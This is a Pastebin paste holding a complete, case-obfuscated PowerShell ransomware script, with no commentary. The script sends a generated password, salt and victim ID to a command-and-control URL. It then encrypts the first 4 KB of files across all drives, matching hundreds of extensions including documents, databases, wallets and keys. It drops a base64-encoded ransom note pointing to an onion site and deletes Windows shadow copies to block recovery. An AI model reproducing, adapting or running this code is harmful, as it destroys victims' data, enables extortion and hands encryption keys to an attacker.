Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- $ScriptsPath = "HKCU:\Software\ENCRDEC\Scripts"
- $VersionString = "Version"
- if((Test-Path $ScriptsPath) -eq $true)
- {exit}
- else
- {
- New-Item -Path $ScriptsPath -Force | Out-Null
- New-ItemProperty -Path $ScriptsPath -Name $VersionString -Value "0" `
- -PropertyType DWORD -Force | Out-Null}
- $Password = ([chaR[]](geT-RAnDOM -inpUT $(48..57 + 65..90 + 97..122) -CoUnT 49)) -jOIN ""
- $Salt = ([Char[]](geT-raNDOm -iNPut $(48..57 + 65..90 + 97..122) -coUNt 19)) -Join ""
- $VictimID = ([cHaR[]](geT-RanDom -INPut $(48..57 + 65..90 + 97..122) -COuNt 24)) -join ""
- $C2 = "http://joelosteel.gdn/pi.php"
- $Params = "string=$Password&string2=$Salt&uuid=$VictimID"
- $XMLHTTP = nEw-OBjECT -coMOBJeCT MSxMl2.Xmlhttp
- $XMLHTTP.oPen('PoST', $C2, $faLse)
- $XMLHTTP.sEtRequestHeader("c"+"oNTENt-TYPE","AppLIcatIoN/X-wwW-fOrM-URL"+"EnCOdeD")
- $XMLHTTP.setReQuestHeaDer("c"+"ontENT-LengTH", $post.length)
- $XMLHTTP.SetRequeStHeader("cONneCtiOn", "clOSe")
- $XMLHTTP.SeNd($Params)
- Start-Sleep -Seconds 120
- [BytE[]]$FileBytes=[SysTem.tExt.EnCODInG]::UniCode.GetBYtes($Password)
- $SaltBytes = [Text.Encoding]::UTF8.GetBytes($Salt)
- $AES = new-ObjeCt System.SecuRity.Cryptography.RijndaelMaNaged
- $AES.Key = (new-Object Security.CryPtography.RFc2898DeriveBytes $Password, $SaltBytes, 5).GetBytes(32)
- $AES.IV = (neW-Object Security.Cryptography.ShA1Managed).ComputeHash([Text.Encoding]::UTF8.GetBytes("alle") )[0..15]
- $AES.Padding="ZeRos"
- $AES.Mode="CBC"
- $Directory= gDr|where {$_.Free}|Sort-Object -Descending
- foreach($bGgxjhxRfshdjcTghajsichGhshjdj in $Directory){
- gci $bGgxjhxRfshdjcTghajsichGhshjdj.root -RecursE -InClude "*.yuv","*.ycbcra","*.xis","*.x3f","*.x11","*.wpd","*.tex","*.sxg","*.stx","*.st8","*.st5","*.srw","*.srf","*.sr2","*.sqlitedb","*.sqlite3","*.sqlite","*.sdf","*.sda","*.sd0","*.s3db","*.rwz","*.rwl","*.rdb","*.rat","*.raf","*.qby","*.qbx","*.qbw","*.qbr","*.qba","*.py","*.psafe3","*.plc","*.plus_muhd","*.pdd","*.p7c","*.p7b","*.oth","*.orf","*.odm","*.odf","*.nyf","*.nxl","*.nx2","*.nwb","*.ns4","*.ns3","*.ns2","*.nrw","*.nop","*.nk2","*.nef","*.ndd","*.myd","*.mrw","*.moneywell","*.mny","*.mmw","*.mfw","*.mef","*.mdc","*.lua","*.kpdx","*.kdc","*.kdbx","*.kc2","*.jpe","*.incpas","*.iiq","*.ibz","*.ibank","*.hbk","*.gry","*.grey","*.gray","*.fhd","*.fh","*.ffd","*.exf","*.erf","*.erbsql","*.eml","*.dxg","*.drf","*.dng","*.dgc","*.des","*.der","*.ddrw","*.ddoc","*.dcs","*.dc2","*.db_journal","*.csl","*.csh","*.crw","*.craw","*.cib","*.ce2","*.ce1","*.cdrw","*.cdr6","*.cdr5","*.cdr4","*.cdr3","*.bpw","*.bgt","*.bdb","*.bay","*.bank","*.backupdb","*.backup","*.back","*.awg","*.apj","*.ait","*.agdl","*.ads","*.adb","*.acr","*.ach","*.accdt","*.accdr","*.accde","*.ab4","*.3pr","*.3fr","*.vmxf","*.vmsd","*.vhdx","*.vhd","*.vbox","*.stm","*.st7","*.rvt","*.qcow","*.qed","*.pif","*.pdb","*.pab","*.ost","*.ogg","*.nvram","*.ndf","*.m4p","*.m2ts","*.log","*.hpp","*.hdd","*.groups","*.flvv","*.edb","*.dit","*.dat","*.cmt","*.bin","*.aiff","*.xlk","*.wad","*.tlg","*.st6","*.st4","*.say","*.sas7bdat","*.qbm","*.qbb","*.ptx","*.pfx","*.pef","*.pat","*.oil","*.odc","*.nsh","*.nsg","*.nsf","*.nsd","*.nd","*.mos","*.indd","*.iif","*.fpx","*.fff","*.fdb","*.dtd","*.design","*.ddd","*.dcr","*.dac","*.cr2","*.cdx","*.cdf","*.blend","*.bkp","*.al","*.adp","*.act","*.xlr","*.xlam","*.xla","*.wps","*.tga","*.rw2","*.r3d","*.pspimage","*.ps","*.pct","*.pcd","*.m4v","*.fxg","*.flac","*.eps","*.dxb","*.drw","*.dot","*.db3","*.cpi","*.cls","*.cdr","*.arw","*.ai","*.aac","*.thm","*.srt","*.save","*.safe","*.rm","*.pwm","*.pages","*.obj","*.mlb","*.md","*.mbx","*.lit","*.laccdb","*.kwm","*.idx","*.html","*.flf","*.dxf","*.dwg","*.dds","*.csv","*.css","*.config","*.cfg","*.cer","*.asx","*.aspx","*.aoi","*.accdb","*.7zip","*.1cd","*.xls","*.wab","*.rtf","*.prf","*.ppt","*.oab","*.msg","*.mapimail","*.jnt","*.doc","*.dbx","*.contact","*.n64","*.m4a","*.m4u","*.m3u","*.mid","*.wma","*.flv","*.3g2","*.mkv","*.3gp","*.mp4","*.mov","*.avi","*.asf","*.mpeg","*.vob","*.mpg","*.wmv","*.fla","*.swf","*.wav","*.mp3","*.qcow2","*.vdi","*.vmdk","*.vmx","*.wallet","*.upk","*.sav","*.re4","*.ltx","*.litesql","*.litemod","*.lbf","*.iwi","*.forge","*.das","*.d3dbsp","*.bsa","*.bik","*.asset","*.apk","*.gpg","*.aes","*.ARC","*.PAQ","*.tar.bz2","*.tbk","*.bak","*.tar","*.tgz","*.gz","*.7z","*.rar","*.zip","*.djv","*.djvu","*.svg","*.bmp","*.png","*.gif","*.raw","*.cgm","*.jpeg","*.jpg","*.tif","*.tiff","*.NEF","*.psd","*.cmd","*.bat","*.sh","*.class","*.jar","*.java","*.rb","*.asp","*.cs","*.brd","*.sch","*.dch","*.dip","*.pl","*.vbs","*.vb","*.js","*.asm","*.pas","*.cpp","*.php","*.ldf","*.mdf","*.ibd","*.MYI","*.MYD","*.frm","*.odb","*.dbf","*.db","*.mdb","*.sql","*.SQLITEDB","*.SQLITE3","*.011","*.010","*.009","*.008","*.007","*.006","*.005","*.004","*.003","*.002","*.001","*.pst","*.onetoc2","*.asc","*.lay6","*.lay","*.ms11","*.sldm","*.sldx","*.ppsm","*.ppsx","*.ppam","*.docb","*.mml","*.sxm","*.otg","*.odg","*.uop","*.potx","*.potm","*.pptx","*.pptm","*.std","*.sxd","*.pot","*.pps","*.sti","*.sxi","*.otp","*.odp","*.wb2","*.123","*.wks","*.wk1","*.xltx","*.xltm","*.xlsx","*.xlsm","*.xlsb","*.slk","*.xlw","*.xlt","*.xlm","*.xlc","*.dif","*.stc","*.sxc","*.ots","*.ods","*.hwp","*.602","*.dotm","*.dotx","*.docm","*.docx","*.DOT","*.3dm","*.max","*.3ds","*.xml","*.txt","*.CSV","*.uot","*.RTF","*.pdf","*.XLS","*.PPT","*.stw","*.sxw","*.ott","*.odt","*.DOC","*.pem","*.p12","*.csr","*.crt","*.key"|%{
- try{
- $File = New-Object SyStem.IO.BinaryReader([System.IO.File]::Open($_, [System.IO.FileMode]::Open, [System.IO.FileAccess]::ReadWrite, [System.IO.FileShare]::Read),[System.Text.Encoding]::ASCII)
- if ($File.BaseStream.Length -lt 4096){
- $SizeToEncrypt = $File.BaseStream.Length
- }
- else
- {
- $SizeToEncrypt = 4096
- }
- $FileBytes = $File.ReadByTes($SizeToEncrypt)
- $File.Close()
- $CryptoTransform = $AES.CreateEncRyPtor()
- $MemoryStream = new-Object IO.MemoryStream
- $CryptoStream = new-Object Security.Cryptography.CryptoStream $MemoryStream,$CryptoTransform,"Write"
- $CryptoStream.Write($FileBytes, 0,$FileBytes.Length)
- $CryptoStream.Close()
- $MemoryStream.Close()
- $CryptoTransform.Clear()
- $EncryptedBytes = $MemoryStream.ToArray()
- $EncryptedFile = New-Object System.IO.BinaryWriter([System.IO.File]::Open($_, [System.IO.FileMode]::Open, [System.IO.FileAccess]::ReadWrite, [System.IO.FileShare]::Read),[System.Text.Encoding]::ASCII)
- $EncryptedFile.Write($EncryptedBytes,0,$EncryptedBytes.Length)
- $EncryptedFile.Close()
- $RansomNotePath = $_.Directory.ToString() + '\_README-Encrypted-Files.html'
- $RansomNoteContents = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String("PGZvbnQgZmFjZT0ibW9ub3NwYWNlIj48aDE+ISEhIElNUE9SVEFOVCBJTkZPUk1BVElPTiAhISEhPC9oMT48YnI+DQoNCkFsbCBvZiB5b3VyIGZpbGVzIGFyZSBlbmNyeXB0ZWQgd2l0aCBSU0EtMjA0OCBhbmQgQUVTLTEyOCBjaXBoZXJzLjxicj4NCk1vcmUgaW5mb3JtYXRpb24gYWJvdXQgdGhlIFJTQSBhbmQgQUVTIGNhbiBiZSBmb3VuZCBoZXJlOjxicj4NCjxhIGhyZWY9Imh0dHA6Ly9lbi53aWtpcGVkaWEub3JnL3dpa2kvUlNBXyhjcnlwdG9zeXN0ZW0pIj5odHRwOi8vZW4ud2lraXBlZGlhLm9yZy93aWtpL1JTQV8oY3J5cHRvc3lzdGVtKTwvYT48YnI+DQo8YSBocmVmPSJodHRwOi8vZW4ud2lraXBlZGlhLm9yZy93aWtpL0FkdmFuY2VkX0VuY3J5cHRpb25fU3RhbmRhcmQiPmh0dHA6Ly9lbi53aWtpcGVkaWEub3JnL3dpa2kvQWR2YW5jZWRfRW5jcnlwdGlvbl9TdGFuZGFyZDwvYT48YnI+DQogICANCjxwPkRlY3J5cHRpbmcgb2YgeW91ciBmaWxlcyBpcyBPTkxZIHBvc3NpYmxlIHdpdGggdGhlIHByaXZhdGUga2V5IGFuZCBkZWNyeXB0IHByb2dyYW0sIHdoaWNoIGlzIG9uIG91ciBzZWNyZXQgc2VydmVyLjxicj4NCg0KVG8gcmVjZWl2ZSB5b3VyIHByaXZhdGUga2V5IGZvbGxvdyB0aGlzIGxpbms6PGJyPg0KDQoxLiA8YSBocmVmPSJodHRwOi8vNXp6Zmh6ZnRzcGFkbGdqZS5vbmlvbi50byI+aHR0cDovLzV6emZoemZ0c3BhZGxnamUub25pb24udG88L2E+PGJyPg0KDQo8cD5JZiB0aGUgYWRkcmVzcyBpcyBub3QgYXZhaWxhYmxlLCBmb2xsb3cgdGhlc2Ugc3RlcHM6PGJyPg0KMS4gRG93bmxvYWQgYW5kIGluc3RhbGwgVG9yIEJyb3dzZXI6IDxhIGhyZWY9Imh0dHBzOi8vd3d3LnRvcnByb2plY3Qub3JnL2Rvd25sb2FkL2Rvd25sb2FkLWVhc3kuaHRtbCI+aHR0cHM6Ly93d3cudG9ycHJvamVjdC5vcmcvZG93bmxvYWQvZG93bmxvYWQtZWFzeS5odG1sPC9hPjxicj4NCjIuIEFmdGVyIGEgc3VjY2Vzc2Z1bCBpbnN0YWxsYXRpb24sIHJ1biB0aGUgYnJvd3NlciBhbmQgd2FpdCBmb3IgaW5pdGlhbGl6YXRpb24uPGJyPg0KMy4gVHlwZSBpbiB0aGUgYWRkcmVzcyBiYXI6IDV6emZoemZ0c3BhZGxnamUub25pb248YnI+DQo0LiBGb2xsb3cgdGhlIGluc3RydWN0aW9ucyBvbiB0aGUgc2l0ZS48YnI+PC9mb250Pg=="));
- if(!(Test-path($RansomNotePath))){
- New-IteM -Path $RansomNotePath -ItemTyPe file -Value $RansomNoteContents
- AdD-Content -PAth $RansomNotePath -VaLue ("<p><font face'monospace'><h1>!!! Your Personal identification ID: $VictimID</p></font></h1>")
- }}
- catch
- {
- }
- }}
- $ShadowCopies = Get-WmiObjEct Win32_ShadoWCopy
- ForEach($ShadowCopy in $ShadowCopies) {
- $ShadowCopy.Delete()
- }
- exit
Add Comment
Please, Sign In to add comment